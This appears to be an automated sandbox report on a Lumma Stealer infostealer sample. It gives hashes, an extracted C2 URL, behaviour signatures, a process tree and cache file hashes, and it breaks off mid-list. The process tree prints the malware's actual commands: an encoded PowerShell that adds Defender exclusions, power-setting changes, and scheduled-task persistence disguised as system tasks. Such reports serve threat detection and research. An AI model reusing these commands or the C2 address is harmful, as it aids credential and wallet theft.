Analysis

  • max time kernel
    210s
  • max time network
    211s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    05-07-2024 16:09

General

  • Target

  • Size

    110.8MB

  • MD5

    d0df0647d2681b9d311c11078ccf5812

  • SHA1

    6d2fb23200b7aa0b6ee64a44c40cb22974f6744e

  • SHA256

    f8f22ed85c5e62f8c18d55f794d9c9ff8e864fd9f30c35e2b97bff1917afee1d

  • SHA512

    5d4d20dec45570680214212e2937b504ee0fcc1413dec076a85f94a0709d4e91691b75967f688a5bbc7afe9d2fe90175765c6c5fabae69d14de3f56fed466fb0

  • SSDEEP

    98304:f2OktbpMKV13qLdT/RJywAFh20HEKG4EURcQ4i9:BC1aLdLRJyw220kKdj9

Malware Config

Extracted

Family

lumma

C2

https://bouncedgowp.shop/api

Signatures

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Downloads MZ/PE file
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 8 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Power Settings 1 TTPs 1 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 20 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 42 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4180
    • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:5104
      • C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe
        "C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3656
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:212
          • C:\Windows\system32\mode.com
            mode 65,10
            5⤵
              PID:4808
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e file.zip -p1404753551733818025492326517 -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:4796
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_6.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:4272
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_5.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:3740
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_4.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:3316
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_3.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:812
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_2.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:1928
            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
              7z.exe e extracted/file_1.zip -oextracted
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:1840
            • C:\Windows\system32\attrib.exe
              attrib +H "Installer.exe"
              5⤵
              • Views/modifies file attributes
              PID:752
            • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
              "Installer.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:868
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /C powershell -EncodedCommand "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                6⤵
                • Power Settings
                • Suspicious use of WriteProcessMemory
                PID:4228
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -EncodedCommand "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA=="
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1192
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4320
                • C:\Windows\SysWOW64\schtasks.exe
                  SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4656
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1537" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:3468
                • C:\Windows\SysWOW64\schtasks.exe
                  SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1537" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  7⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1880
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:1472
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        1⤵
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:4332
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff932369758,0x7ff932369768,0x7ff932369778
          2⤵
            PID:2540
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:2
            2⤵
              PID:2236
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
              2⤵
                PID:4448
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2052 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
                2⤵
                  PID:4936
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2852 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
                  2⤵
                    PID:4816
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2860 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
                    2⤵
                      PID:4668
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4416 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
                      2⤵
                        PID:752
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
                        2⤵
                          PID:2352
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
                          2⤵
                            PID:1812
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4944 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
                            2⤵
                              PID:3656
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5272 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
                              2⤵
                                PID:2452
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3032 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
                                2⤵
                                  PID:5108
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4592 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
                                  2⤵
                                    PID:2644
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
                                    2⤵
                                      PID:3984
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6084 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
                                      2⤵
                                        PID:60
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4768 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
                                        2⤵
                                          PID:2572
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4484 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
                                          2⤵
                                            PID:4280
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4604 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
                                            2⤵
                                              PID:1004
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5496 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
                                              2⤵
                                                PID:2456
                                              • C:\Users\Admin\Downloads\7z2407-x64.exe
                                                "C:\Users\Admin\Downloads\7z2407-x64.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                • Modifies registry class
                                                PID:2832
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2388 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
                                                2⤵
                                                  PID:752
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4548 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
                                                  2⤵
                                                    PID:4316
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4896 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
                                                    2⤵
                                                      PID:4940
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6132 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
                                                      2⤵
                                                        PID:3468
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5424 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
                                                        2⤵
                                                          PID:4852
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2992 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
                                                          2⤵
                                                            PID:2340
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3108 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
                                                            2⤵
                                                              PID:3376
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6452 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
                                                              2⤵
                                                                PID:3296
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6596 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1
                                                                2⤵
                                                                  PID:4012
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6716 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8
                                                                  2⤵
                                                                    PID:3004
                                                                • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                  1⤵
                                                                    PID:2904
                                                                  • C:\Windows\system32\AUDIODG.EXE
                                                                    C:\Windows\system32\AUDIODG.EXE 0x27c
                                                                    1⤵
                                                                      PID:3544

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v15

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

                                                                      Filesize

                                                                      211KB

                                                                      MD5

                                                                      151fb811968eaf8efb840908b89dc9d4

                                                                      SHA1

                                                                      7ec811009fd9b0e6d92d12d78b002275f2f1bee1

                                                                      SHA256

                                                                      043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed

                                                                      SHA512

                                                                      83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001c

                                                                      Filesize

                                                                      47KB

                                                                      MD5

                                                                      127b7a9f7009939d0ae5dd1a48386985

                                                                      SHA1

                                                                      f9e981f2fbc6df7e304803153fb6fe40f0dcb6ac

                                                                      SHA256

                                                                      9d8e3219c036313e8b27ecb7b91befc49de6a32352a5349656945a7525a89962

                                                                      SHA512

                                                                      b1a442d78f6adc7a67f8ee299d46817309798ff2a38a66af2ff03eaa276b3a7967fde34e801dc8488ed75b3110fd01b3a9763f792ce75e21fae190d4779c1287

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f

                                                                      Filesize

                                                                      808KB

                                                                      MD5

                                                                      c0637a08f2ba40c56260782d2bb3ace4

                                                                      SHA1

                                                                      a2bf4298414a764ff1342b3f48f45b4dc1669a96

                                                                      SHA256

                                                                      d6ab12688ec8cfe7f9235b18c7d7a4730d86278ba1efae0d715c0d054465781e

                                                                      SHA512

                                                                      736d1ac8987102028baef59d43ceb2fde71b3aab2f8f2d8d306846a457e2ac224908968ff7bfe34bb05beb7998223d393244cf5da84f9d64f8b71c9f0b2ca6e2

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000021

                                                                      Filesize

                                                                      32KB

                                                                      MD5

                                                                      af5bf693b92c0d2c8441b3a6640c4ad8

                                                                      SHA1

                                                                      12ed4ac73239e542ab8d7fa191dddc779808e202

                                                                      SHA256

                                                                      b9f2c3f2ec75955d96309f759eaf9fb6bf576c238377491dbb92de1768a26012

                                                                      SHA512

                                                                      c2ef099832fc5e8f1e67acbd550b0590c0fb5c291761280a2e74e6a97763906b9c0c1a2295f285462ba3a0ed7cd5658f296e5f0f9c5d11a97ba210f352f8a438

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000022

                                                                      Filesize

                                                                      32KB

                                                                      MD5

                                                                      cd3756106418d9e83a2baff9904ba221

                                                                      SHA1

                                                                      4c2ed1c1ebe119027db0fbaf7a64b408f1779b4a

                                                                      SHA256

                                                                      57ec0895e1bcaf08c769e2d6872f3f3657972f87fac081063445213dae4541ee

                                                                      SHA512

                                                                      5bf43ccaaf99505f7e8ecf2eda18efe260125accbc12f655601e2acabd822513e153f4b81cbf03a65d13572f11e9f13fd471006a0ce8f2665e8a594ff2d769dd

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                      Filesize

                                                                      408B

                                                                      MD5

                                                                      f9dc26704da07c4fb9b72d27e9f1268e

                                                                      SHA1

                                                                      5beb50fa7dcf9e01aacfe2515014f66510fb985b

                                                                      SHA256

                                                                      3881fb4c16119d039cba801214401ef4bc91c761453b59c72c5c1da23bcdde5c

                                                                      SHA512

                                                                      a5e11bc86897bcde36d4a641545504875f71dd7d465d1a6b5461c2ace78558737a2b4d67a8d1c6a2507fcc224cc76b632ad34d98ab5541acf99a8797767ec5eb

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      42722595c5cf2cf703bf0b5b3e213d5a

                                                                      SHA1

                                                                      60b42e133740423754534db5ffd91df6762ac39d

                                                                      SHA256

                                                                      000e35848937e0132ed037079d0adb1a2b444db7f9866e442269f33efc2eaf15

                                                                      SHA512

                                                                      30e25f1d2f7798c46b0c4c7c2c54edc3a22b668cf69d9daf33885e90fbb10409e457c0ab616a87bfc91db95e9100c5e6bfd0899fdf602ca6a2a244931b9092a1

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                      Filesize

                                                                      371B

                                                                      MD5

                                                                      63864ed43e5004147163ad1f5c1701f6

                                                                      SHA1

                                                                      13d50dea98eca9481f4dacb518e8a8157a9f1c2a

                                                                      SHA256

                                                                      3fd036346ceff5464fa87948ab306d966f2ebae9f70f06d662f374b73c7fa9cc

                                                                      SHA512

                                                                      8db95e08010e03248914d2de7a906767b37711bd4af83c0969a0e5137d2fffb0cdfa97bf6867e769e4eb526cff82e4ae03c72e6ae117cd4711e6e2b88067dda0

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                      Filesize

                                                                      706B

                                                                      MD5

                                                                      18bba9dd6808199233d001996193daf9

                                                                      SHA1

                                                                      dc5a01485d8334f560daad3555827327dca5e80c

                                                                      SHA256

                                                                      3e9ba9a4e528147effd37ad85a0cc100cfc61c5865d4134ab730ce4ad65c017f

                                                                      SHA512

                                                                      b4cb58c597f210db1467b4bc9b72c321b5f314e068cf9819aab875d0d1855109fe483869197bdc29070378161388a182110a43da6dc489235914e739227ca1b9

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      f59459fcda8df0c834f4ab23336c96e7

                                                                      SHA1

                                                                      e2c5ce89cd38fdab552008015426fdca30f15c07

                                                                      SHA256

                                                                      96c32d5c4b8c6c59713aaac3f3d43ddfcd37ddf548feffbc75b1d1fd21dba1cb

                                                                      SHA512

                                                                      f0498022c2d5a66f66088390ba793df030bbdf614f723b3038e624992fac1c19c36a61177d5893e8da046e6a7fa1315f263789fb534a5190439466f5d763f8c1

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                      Filesize

                                                                      538B

                                                                      MD5

                                                                      f9963a1618d6458ee89ae77ac559c8e4

                                                                      SHA1

                                                                      a2b95ca3e9e0d9e5d564f4c04e6c193d35fa0101

                                                                      SHA256

                                                                      bd2bd0dbac571dc8000739d8f61d00a1c0682e44babad869a88c67c3cff8f44d

                                                                      SHA512

                                                                      1d7b4dc00d4a91300c6739a9012f3bf081603e3432a94cb0e49c263e05feefa6b227b1f4f7cc223c5d6228abd3c3fccfd743b6700c351b98386e810385a02209

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                      Filesize

                                                                      371B

                                                                      MD5

                                                                      452b01aa9ffd717677accf05f8ae5528

                                                                      SHA1

                                                                      5db1aa50894c7a16c638ab796031bd17d2dbe7fe

                                                                      SHA256

                                                                      2195dd236c5b9ed6ca06fa47ae0cb39a403a30663c8ad1735e60b4cbab8fbb62

                                                                      SHA512

                                                                      177d66e0e2e88ca26d0ba91fdb7e45adc498b6177d1d8ea6e9d4f7062b963a1b9de6ec0ba3026eace8f3f423249aa3b3b114c873b16bb343f8af9e8ef5f51bd8

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                      Filesize

                                                                      6KB

                                                                      MD5

                                                                      2269e6fb00d925f9b840301637d32b71

                                                                      SHA1

                                                                      02a04bd01cdd665982dc266aad21016fb647e27f

                                                                      SHA256

                                                                      360baaaa33627edf06eb04cc009fa056125214993426aeeb5dc51328e023c54b

                                                                      SHA512

                                                                      ea0b786f55f3733fef98ae2d71280001b1eb4827c0884e37ea6ac3a6def3d083df2568e0dbaa3e3b51f4da30eef8b1a8bfd9ba70ec5a8bec2f2ab1502024194d

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                      Filesize

                                                                      7KB

                                                                      MD5

